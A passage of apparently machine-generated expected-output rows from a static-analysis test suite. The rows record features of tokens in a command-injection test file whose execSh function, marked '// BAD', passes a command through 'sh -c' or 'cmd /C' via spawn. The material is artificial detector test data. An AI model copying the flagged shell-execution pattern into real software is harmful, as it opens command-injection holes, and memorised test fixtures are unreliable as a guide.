enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:18:7:27 | cmd: 'cmd' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:23:7:27 | 'cmd' | assignedToPropName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:23:7:27 | 'cmd' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:23:7:27 | 'cmd' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:23:7:27 | 'cmd' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:23:7:27 | 'cmd' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:23:7:27 | 'cmd' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:32 | arg | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:32 | arg | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:32 | arg | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:32 | arg | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:32 | arg | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:30:7:38 | arg: '/C' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:35:7:38 | '/C' | assignedToPropName | arg | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:35:7:38 | '/C' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:35:7:38 | '/C' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:35:7:38 | '/C' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:35:7:38 | '/C' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:7:35:7:38 | '/C' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:16:9:39 | { cmd: ... '-c' } | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:16:9:39 | { cmd: ... '-c' } | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:16:9:39 | { cmd: ... '-c' } | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:16:9:39 | { cmd: ... '-c' } | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:16:9:39 | { cmd: ... '-c' } | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:20 | cmd | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:20 | cmd | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:20 | cmd | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:20 | cmd | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:20 | cmd | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:18:9:26 | cmd: 'sh' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:23:9:26 | 'sh' | assignedToPropName | cmd | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:23:9:26 | 'sh' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:23:9:26 | 'sh' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:23:9:26 | 'sh' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:23:9:26 | 'sh' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:23:9:26 | 'sh' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:31 | arg | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:31 | arg | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:31 | arg | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:31 | arg | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:31 | arg | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:29:9:37 | arg: '-c' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:34:9:37 | '-c' | assignedToPropName | arg | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:34:9:37 | '-c' | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:34:9:37 | '-c' | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:34:9:37 | '-c' | enclosingFunctionBody | process platform win32 cmd cmd arg /C cmd sh arg -c | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:34:9:37 | '-c' | enclosingFunctionName | getShell | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:9:34:9:37 | '-c' | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | cp | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | cp | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | getShell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | getShell | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | getShell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | this | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | this | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | this | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:13:0 | this | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | 'arguments' object of function execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | 'arguments' object of function execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | 'arguments' object of function execSh | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | 'arguments' object of function execSh | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | 'arguments' object of function execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | exceptional return of function execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | exceptional return of function execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | exceptional return of function execSh | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | exceptional return of function execSh | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | exceptional return of function execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | functio ... / BAD\\n} | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | functio ... / BAD\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | functio ... / BAD\\n} | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | return of function execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | return of function execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | return of function execSh | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | return of function execSh | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:1:16:1 | return of function execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:10:13:15 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:10:13:15 | execSh | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:10:13:15 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:10:13:15 | execSh | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:10:13:15 | execSh | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:10:13:15 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:10:13:15 | execSh | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:17:13:23 | command | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:13:26:13:32 | options | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:13 | shell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:13 | shell | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:13 | shell | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:13 | shell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:13 | shell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell = getShell() | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell = getShell() | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell = getShell() | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell = getShell() | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:9:14:26 | shell = getShell() | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:24 | getShell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:24 | getShell | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:24 | getShell | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:24 | getShell | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:24 | getShell | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | exceptional return of getShell() | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | exceptional return of getShell() | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | exceptional return of getShell() | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | exceptional return of getShell() | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | exceptional return of getShell() | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | getShell() | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | getShell() | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | getShell() | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | getShell() | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:14:17:14:26 | getShell() | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:13 | cp | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:13 | cp | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:13 | cp | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:13 | cp | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:13 | cp | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:19 | cp.spawn | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:19 | cp.spawn | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:19 | cp.spawn | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:19 | cp.spawn | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:19 | cp.spawn | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | cp.spaw ... ptions) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | exceptional return of cp.spaw ... ptions) | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | exceptional return of cp.spaw ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | exceptional return of cp.spaw ... ptions) | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | exceptional return of cp.spaw ... ptions) | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:12:15:61 | exceptional return of cp.spaw ... ptions) | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:15:15:19 | spawn | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:15:15:19 | spawn | contextSurroundingFunctionParameters | (command, options) | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:15:15:19 | spawn | enclosingFunctionBody | command options shell getShell cp spawn shell cmd shell arg command options | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:15:15:19 | spawn | enclosingFunctionName | execSh | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:15:15:19 | spawn | fileImports | child_process http url | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:25 | shell | contextFunctionInterfaces | execSh(command, options)\ngetShell() | +| autogenerated/ShellCommandInjectionFromEnvironment/CommandInjection/exec-sh.js:15:21:15:25 | shell | 